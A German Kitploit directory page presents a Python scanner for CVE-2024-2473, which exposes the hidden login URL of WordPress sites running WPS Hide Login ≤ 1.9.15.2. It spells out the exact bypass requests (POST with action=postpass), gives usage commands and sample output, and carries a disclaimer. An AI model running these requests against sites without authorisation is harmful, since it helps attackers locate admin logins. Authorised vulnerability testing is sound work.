Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-2473 — Offenlegung der versteckten WordPress-Anmeldeseite. Erkennt die Offenlegung der Anmeldeseite auf WordPress-Websites, die WPS Hide Login ≤ 1.9.15.2 ausführen (CVE-2024-2473). | Kitploit
Tools/GitHubGitHub/m4xsec/cve-2024-2473
AufklärungSchwachstellenscannerExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubm4xsec/cve-2024-2473

CVE-2024-2473

Offenlegung der versteckten WordPress-Anmeldeseite. Erkennt die Offenlegung der Anmeldeseite auf WordPress-Websites, die WPS Hide Login ≤ 1.9.15.2 ausführen (CVE-2024-2473).

Repository anzeigen
21vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-2473 — WPS Hide Login Seiten-Identifikator

Ein professioneller Python-Scanner zur Erkennung der Offenlegung der Login-Seite bei WordPress-Websites, die WPS Hide Login ≤ 1.9.15.2 verwenden

Python CVE CVSS License Platform

Programmiert von Venexy


Inhaltsverzeichnis

  • Übersicht
  • Details zur Schwachstelle
  • Funktionsweise
  • Voraussetzungen
  • Installation
  • Verwendung
  • Beispielausgabe
  • Haftungsausschluss
  • Referenzen

Übersicht

WPS Hide Login ist ein beliebtes WordPress-Plugin, das Administratoren ermöglicht, die Standard-URL /wp-login.php in einen eigenen, versteckten Pfad zu ändern – was einer Sicherheit durch Obskurität entspricht.

Dieser Scanner erkennt CVE-2024-2473, eine Schwachstelle, bei der der Parameter action=postpass angegeben werden kann, um den Schutzmechanismus des Plugins vollständig zu umgehen und die URL der versteckten Login-Seite für nicht authentifizierte Angreifer offenzulegen.


Details zur Schwachstelle

Beschreibung

Das Plugin WPS Hide Login verlagert die WordPress-Login-Seite von der Standard-URL /wp-login.php auf eine vom Administrator gewählte, benutzerdefinierte URL. In allen Versionen bis einschließlich 1.9.15.2 umgeht jedoch die Angabe des Query-Parameters action=postpass an /wp-login.php oder /wp-admin/ diesen Schutz und gibt die tatsächliche Action-URL des versteckten Login-Formulars preis – der geheime Login-Pfad wird dadurch für jeden nicht authentifizierten Angreifer sichtbar.


Funktionsweise

Der Scanner bildet den Angriffsablauf der Schwachstelle in drei Phasen nach:

root@kitploit:~
Phase 1  ─►  Confirm target is a WordPress installation
                  │
                  ▼
Phase 2a ─►  POST /wp-login.php?action=postpass
             with body: action=lostpassword&post_password=test
             Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
             Extract hidden login URL from form action attribute
                  │
Phase 2b ─►  POST /wp-admin/?action=postpass
             Check: HTTP 302 redirect to location containing reauth=1 or /login
                  │
                  ▼
             Report hidden login URL if discovered

Wenn entweder Phase 2a oder Phase 2b zutrifft, wird das Ziel als verwundbar markiert.


Voraussetzungen

  • Python 3.7 oder höher
  • requests-Bibliothek

Installation

1. Repository klonen

root@kitploit:~
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473

2. Abhängigkeiten installieren

root@kitploit:~
pip install requests

Hinweis: Auf Systemen mit Python-Virtualenvs oder Kali Linux kann Folgendes erforderlich sein:

root@kitploit:~
pip install requests --break-system-packages

Verwendung

root@kitploit:~
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]

Argumente

ArgumentBeschreibungStandard
-u, --url

Beispiele

root@kitploit:~
# Basic scan
python CVE-2024-2473.py -u https://example.com

# Scan with custom timeout
python CVE-2024-2473.py -u https://example.com --timeout 15

# Scan over HTTP
python CVE-2024-2473.py -u http://192.168.1.100

Beispielausgabe

root@kitploit:~
 ...

  ┌─────────────────────────────────────────────────────────────┐
  │  CVE-2024-2473  •  WPS Hide Login Page Identifier           │
  │  Coded by Venexy | https://github.com/m4xsec               │
  └─────────────────────────────────────────────────────────────┘

  ===============================================================
    TARGET    https://example.com
    TIME      2024-11-01 18:00:00
    TIMEOUT   10s
  ===============================================================

  [18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
  [18:00:01] [+] WordPress confirmed — https://example.com

  [18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...

  [18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
             +- Status : 200   Result : MATCH

  [18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
             +- Status : 302   Result : MATCH

  ###############################################################
  ##           VULNERABILITY CONFIRMED  --  CVE-2024-2473      ##
  ###############################################################

    Plugin          WPS Hide Login <= 1.9.15.2
    Severity        Medium (CVSS 5.3 / EPSS 93rd percentile)
    CWE             CWE-200 — Exposure of Sensitive Information
    CVSS Vector     AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N

  [18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass

  ====================================================
        HIDDEN LOGIN URL DISCOVERED
  ====================================================

  >>  https://example.com/my-secret-admin-path/

  ====================================================

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt.

Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Holen Sie vor der Durchführung einer Sicherheitsbewertung stets die ausdrückliche schriftliche Genehmigung des Eigentümers des Zielsystems ein. Nicht autorisiertes Scannen oder Ausnutzen von Systemen ist illegal und unethisch.

Nutzen Sie es verantwortungsbewusst.


Referenzen


Mit ❤️ programmiert von Venexy

Wenn dir dieses Tool geholfen hat, erwäge, dem Repository einen ⭐🌟🌟🌟 zu geben

Tool herunterladen
FeldDetails
CVE IDCVE-2024-2473
BetroffenWPS Hide Login Plugin ≤ 1.9.15.2 für WordPress
SchweregradMittel
CVSS-Score5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CWECWE-200 — Offenlegung sensibler Informationen
EPSS-Score0.10433 (93. Perzentil)
Authentifizierung erforderlichKeine
AnbieterWPServeur
AbhilfePlugin auf Version > 1.9.15.2 aktualisieren
Basis-URL der Ziel-WordPress-Website (erforderlich)
—
-t, --timeoutHTTP-Request-Timeout in Sekunden10
RessourceLink
NVD — CVE-2024-2473https://nvd.nist.gov/vuln/detail/CVE-2024-2473
Wordfence-Sicherheitshinweishttps://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure
WPS Hide Login Pluginhttps://wordpress.org/plugins/wps-hide-login/
CWE-200https://cwe.mitre.org/data/definitions/200.html
CVSS-3.1-Rechnerhttps://www.first.org/cvss/calculator/3.1